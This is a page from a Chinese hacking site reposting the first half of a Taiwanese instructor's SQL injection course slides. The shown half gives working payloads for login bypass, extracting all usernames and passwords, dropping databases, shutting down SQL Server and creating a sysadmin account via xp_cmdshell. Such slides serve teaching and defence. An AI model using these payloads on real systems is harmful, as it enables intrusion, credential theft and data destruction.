黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]EST原内部资料 SQL Injection资料隐码
      ★★★★★

EST原内部资料 SQL Injection资料隐码

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-8-7 9:11:44

文章作者:胡百敬 老师
原文章精美PPT下载:
http://www.eviloctal.com/weblog/blog.p ... cleid=a_20041031_023901
十分感谢台湾恒逸信息教育训练处系统开发部资深讲师胡百敬...十分感激...同时感谢 ESG TW
SQL Injection (資料隱码) -駭客的 SQL填空遊戲

大綱
何謂 SQL Injection
程序漏洞
剪接 SQL 語法
利用錯誤訊息
破壞性的工作
使用進階的延伸預存程序
使用 SQL Server 所附的工具程序
防範 SQL Injection 與系統安全設定
何謂 SQL Injection
程序寫作的漏洞,利用修該過的 SQL 語法遂行駭客的目的。
並非病毒
防火牆檔不住
任何平台都可能發生
程序漏洞
網頁程序码的漏洞

strSQL="Select * FROM tblUser Where UserName='" & _
Request("UserName") & "' AND Password='" & _
Request("Pass") & "'"
'直接交給 SQL Server 执行,這是最危險的地方
Set rec=cnn.Execute(strSQL)
If NOT rec.EOF Then



Demo:簡單介紹資料庫架構與 ASP 網頁
剪接 SQL 語法
利用已知的帐号,但不用密码直接登入
猜測、 監看或用熟知的帐号規則,如員工代號,身分證號码Ex: Admin’--交由 SQL Server 执行的語法變成

Select * FROM tblUser
Where UserName='admin'--' AND Password='asdf'

Demo:利用已知的帐号登入
剪接 SQL 語法
利用未知的帐号登入
Ex:'or 1=1--交由 SQL Server 执行的語法變成

Select * FROM tblUser
Where UserName='' or 1=1--' AND Password='asdf'

Demo:利用未知的帐号登入
利用錯誤訊息
故意製造 SQL 語法的錯誤,利用錯誤訊息獲取查詢語法與資料表的架構
藉由 GROUP BY 和 HAVING 子句傳回的錯誤訊息Ex:' HAVING 1=1--

Select * FROM tblUser Where UserName='' HAVING 1=1--' AND Password='asdf'

Demo:利用錯誤訊息取得查詢語法
利用錯誤訊息
利用錯誤訊息取得資料表內各欄位的資料型態Ex:'UNION Select 'abc',1,1,1 FROM tblUser --

Select * FROM tblUser Where UserName=''UNION Select 'abc',1,1,1 FROM tblUser --' AND Password='asdf'

Demo:利用錯誤訊息取得欄位結構
利用錯誤訊息
利用錯誤訊息獲取會員的帐号和密码Ex:'UNION Select UserName,1,1,1 FROM tblUser Where UserName>'a'--'UNION Select Password,1,1,1 FROM tblUser Where UserName='admin'--

Select * FROM tblUser Where UserName=''UNION Select UserName,1,1,1 FROM tblUser Where UserName>'a'--' AND Password='asdf'

Demo:利用錯誤訊息取得帐号密码
利用錯誤訊息
取得全部的帐号密码Ex:';DECLARE @str VARCHAR(8000) SET @str='@' Select @str=@str+' '+UserName+'/'+Password FROM tblUser Where UserName>@str Select @str AS IDPass INTO tblHacker-- ' UNION Select IDPass,1,1,1 FROM tblHacker--

Demo:利用錯誤訊息取得全部帐号密码
破壞性的工作
利用 SQL 語法做一些破壞性工作
停止执行 SQL Server:' ;SHUTDOWN--
刪除資料庫:' ;Drop Database <資料庫名稱>--
刪除資料表: ' ;Drop Table <資料表名稱>--
刪除資料:' ;Truncate Table <資料表名稱>--
刪除資料: ' ;Delete FROM <資料表名稱>--

Demo:做一些破壞性的工作
使用進階的延伸預存程序
XP_CMDSHELL:以 SQL Server 的系統帐号來执行系統上其他的應用程序
Ex:加入一個系統帐号到 SQL Server

' ; EXEC MASTER..XP_CMDSHELL 'net user Hacker /add' EXEC MASTER..SP_GRANTLOGIN 'BYRON-XP\Hacker' EXEC MASTER..SP_ADDSRVROLEMEMBER 'BYRON-XP\Hacker','sysadmin'--

Demo:利用 XP_CMDSHELL 加帐号
使用進階的延伸預存程序
與註冊資料庫相關的延伸預存程序
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Create TABLE tblShareDir(DirName VARCHAR(100), DirAtt VARCHAR(100))
Insert tblShareDir EXEC MASTER..XP_REGENUMVALUES HKEY_LOCAL_MACHINE,'system\CurrentControlSet\Services\lanmanserver\shares'

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886